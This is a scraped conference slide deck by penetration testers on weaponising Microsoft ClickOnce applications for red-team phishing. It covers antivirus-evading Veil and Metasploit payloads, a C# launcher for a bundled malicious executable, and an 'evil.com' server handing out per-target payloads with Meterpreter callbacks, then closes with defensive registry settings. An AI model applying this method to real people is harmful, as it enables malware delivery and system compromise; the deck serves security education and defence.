Upload
netspi
View
82
Download
0
Tags:
Embed Size (px)
Citation preview
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
All You Need Is One - A ClickOnce Love Story
Ryan Gandrud
Cody Wass
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Introduction
• Ryan Gandrud
– Penetration tester
– Computer enthusiast
• Cody Wass
– Web applications
– Scotch aficionado
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Overview
• ClickOnce?
• Phishing-phriendly pheatures
• Creating a malicious ClickOnce application
• Phishing setup
• Issues and pitfalls
• Demo
• Prevention
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
ClickOnce WTF?
• ClickOnce – What is it?
– ClickOnce is a wrapper that sitsaround a Windows executable to “install” it on a machine
– Used by application administrators to deploy installations to users in thenetwork
– Supports multiple deployment methods(web, network share, local execution)
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
ClickOnce Internals
• ProjectName.application– Contains the location of the manifest and application version
information
• ProjectName.exe.config.deploy– Contains application settings (i.e. connection strings, etc.)
• ProjectName.exe.deploy– The (potentially malicious) executable that will be run by a user
• ProjectName.exe.manifest– Manifest file containing application version, .NET versions
supported, permission level requested, and signatures for the other files
– Contains the file name for the executable
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
ClickOnce Certificate Signing
• ClickOnce and .NET support signing applications
• Authenticode – Microsoft cert-based signing technology used to verify the authenticity of publisher
• Need to “acquire” an code-signing Authenticode certificate from a Certificate Authority (CA)
• Signing stages available
– Signed (CA)
– Self-signed (MakeCert.exe in .NET)
– Unsigned (No cert used)
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
ClickOnce Trust Architecture
• Applications and how they are executed are based on a trust architecture separated into different execution source zones
• ClickOnce allows permitted applications to elevate privileges automatically (Trusted Sites) or through prompting the user
• Prompting levels are controlled by the following registry key
– \HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
ClickOnce Trust Architecture (cont.)
• These are features: "But the most important new feature when it comes to security is … the end user can elevate permissions without the help of an administrator“
• “If the application permissions don't exceed policy permissions, the application downloads and runs without asking the user any trust questions.”
• “If the application needs more permissions than what's granted by policy, the user is asked if he wants to trust that application and elevate permissions... If the user clicks Run, the application is put into the Application Trust List and is downloaded and started.”
MSDN:https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
ClickOnce Trust Architecture (cont.)
• When ClickOnce was originally being developed in .NET 2.0 Beta 2, permissions looked promising with the Internet zone being restricted to applications signed by a valid certificate.
Zone Applications
My Computer Enabled
Local Intranet Enabled
Trusted Sites Enabled
Internet Enabled for signed apps
Untrusted Sites Disabled
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
ClickOnce Trust Architecture (cont.)
• Unfortunately, Microsoft decided to change this, specifically the Internet zone, and not for the best
• Now, by default, ClickOnce packages that come from the Internet allow a user to grant the application temporary admin privileges in order to install
Zone Applications
My Computer Enabled
Local Intranet Enabled
Trusted Sites Enabled
Internet Enabled
Untrusted Sites Disabled
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Owning With a Click
• Why use ClickOnce application?
– ClickOnce is supported on all modern Windows operating systems since it relies on .NET
– All distributions come with at least .NET 2.0 since Windows Server 2k3
– .NET supports backwards compatibility
– Dead simple to write
– Public browser exploits are highly version specific and more often than not, crash the victim’s browser
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Owning With a Click (cont.)
• Originally meant to be deployed using Windows Internet Explorer
– ClickOnce is supported by IE 6.0+
– Now supported by Firefox and Chrome using third party addons (.NET 3.5+)
• Minimizes user interaction
• Delivering malicious code through multiple options
– It’s a .NET project – write your own
– Include malicious executable as a resource
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Payloads
• Roll your own payload
– Our original vector
– Flagged by AV
• Standard Metasploit payload
– Also attempted
– Reverse_HTTPS returned broken shells• Assumed due to AV or something inline during delivery of second
Meterpreter stage
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Payloads (cont.)
• Powershell
– Justin@sixdub did a great write-up on using Powershell commands instead of an executable for a Meterpreter callback with ClickOnce
– Pros: • Powershell command runs in memory – never touches disk
– Cons: • Difficulty in changing payloads
• ClickOnce is already on disk
http://www.sixdub.net/?p=555
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Payloads (cont.)
• Veil
– Pros:
• Payloads written in different languages
• Encrypted Payloads – less likely to get caught by AV
– Cons:
• Static “random” Meterpreter callback
• This is an issue with how Metasploit handles stagers– Will be fixed (hopefully) soon
• We decided to go with Veil since we to avoid AV detection during our Red Team engagement
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Payloads (cont.)
• Problem:
– Static Meterpreter callbacks from targets
• Solution?:
– Dynamically generating individualized Veil payloads
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application
• Visual Studio is used to create ClickOnce applications
– The free edition of Visual Studio 2013 supports ClickOnce publishing
• Start a new console application project within Visual Studio
– No GUI popup during execution
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
• Using C# in .NET, create a new process that launches your included executable (ClickOnceInc.exe)
static class Program
{
static void Main()
{
//Starting a new process executing the malicious exe
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = false;
p.StartInfo.FileName = "ClickOnceInc.exe";
p.Start();
}
}
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
• Ensure that your application uses the correct version of .NET so the application runs properly.
• Here, .NET 3.5 was chosen by navigating to the Application tab on the left, and selecting the Target Framework from the dropdown.
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
• Include your malicious binary into the project by clicking and dragging it over your Solution Explorer
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
• In the Properties of the application under Publish:
– Ensure the Install Mode is set to “available online only”
• This prevents the application from showing up in the Start Menu
– Clicking the Application Files… button
• Exclude the hash for the ClickOnceInc.exe
– Dynamic payload generation changes the hash
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
• Clicking the Publish button, follow the wizard to publish the ClickOnce application to your local drive
• There should be multiple files/directories
– Application Files directory
– Evil Survey.application
– Publish.htm
– Setup.exe
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Creating a ClickOnce Application (cont.)
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Server Setup
• Web server with ClickOnce-specific directories
– Kali with Veil, Metasploit, and Apache
• Apache mod_rewrite
– GET evil.com?u={ID} -> evil.com/{ID}/evil.application
– Combined with dynamic Veil payloads, allowed easy analytics and post-mortem data gathering.
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Callback Listener
• Our solution:
– Metasploit listener
• Phishing scenario – targets are workstations
• Most likely have outbound http access
• Limited window of engagement
• Egress filtering– ssh / icmp / dns tunneling
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Pitfalls
• Outdated packages / dependencies
– Veil, Python, Wine.
• Signing restrictions
– No signing allowed with dynamic payloads
• No easy way to use mage.exe on linux
– Self-signed certs are only marginally better
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Cleanup
• ClickOnce install directory:
– %LOCALAPPDATA%\Apps\2.0\{machine-specific}\{machine-specific}\{obfuscated-app-name}
• C:\Users\Bob\AppData\Local\Apps\2.0\F3RBL2XD.32Y\Z3R2E8LL.92S\{app-folder}
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Cleanup
• Add/Remove Programs
• Delete relevant AppData folder
• Nuke everything:
– Note: This will clear the entire online application cache.
– No need for elevated privileges, AppCaches are user-specific.
rundll32 dfshim CleanOnlineAppCache
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Demo
• Client:
– Windows 7
• Server (evil.com):
– Kali running Apache to serve file
– Metasploit listener running to catch callback
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Preventative Measures
• Typical Anti-Phishing Techniques– User education
• Users continue through “… a quarter of Google Chrome’s malware and phishing warnings”
– Endpoint protection
• Signatures lag behind usage
• Heuristics require a practical balance
• Limited usefulness for other phishing-based vectors
– Least privileged configurations
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Preventative Measures
• ClickOnce-Specific Techniques
– Code Access Security
• ClickOnce applications can specify a “permissions level”
• Default: Full Trust – Requires prompt for elevation
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Preventative Measures
• Disabling Trust Prompt– \HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFra
mework\Security\TrustManager\PromptingLevel
– Trust prompt is controlled by zone• Untrusted Sites
• Internet
• My Computer
• Local Intranet
• Trusted Sites
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Preventative Measures
String Value subkey Value
Internet Enabled
UntrustedSites Disabled
MyComputer Enabled
LocalIntranet Enabled
TrustedSites Enabled
Option Registry setting value
Enable the trust prompt. Enabled
Restrict the trust prompt. AuthenticodeRequired
Disable the trust prompt. Disabled
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Preventative Measures
• Windows 8
– SmartScreen Filter
• Enabled by default
• Adds another layer after user clicks ‘run’ for anything not signed by a recognized CA
• Default ‘OK’ action results in application not running
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Flowchart by Robin Shahan (@robindotnet)
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
Questions?
Celebrating a decadeof guiding securityprofessionals.
@Secure360 or #Sec360 www.Secure360.org
More Information / References
• Alice in Warningland: A Large-Scale Field Study of Browser Security Warning Effectiveness
– Devdatta Akhawe University of California, Berkeley, [email protected]
– Adrienne Porter Felt Google, Inc, [email protected]
• http://leastprivilege.com/2006/02/18/beware-be-aware-of-clickonce-default-settings/
• https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx
• https://msdn.microsoft.com/en-us/library/cc176048(v=vs.90).aspx
• https://msdn.microsoft.com/en-us/library/ee308453.aspx
• https://robindotnet.wordpress.com/2013/02/24/windows-8-and-clickonce-the-definitive-answer-2/
• https://blog.netspi.com/bypassing-av-with-veil-evasion/
• https://github.com/rapid7/metasploit-framework/issues/4895
• http://www.sixdub.net/?p=555
• https://blog.netspi.com/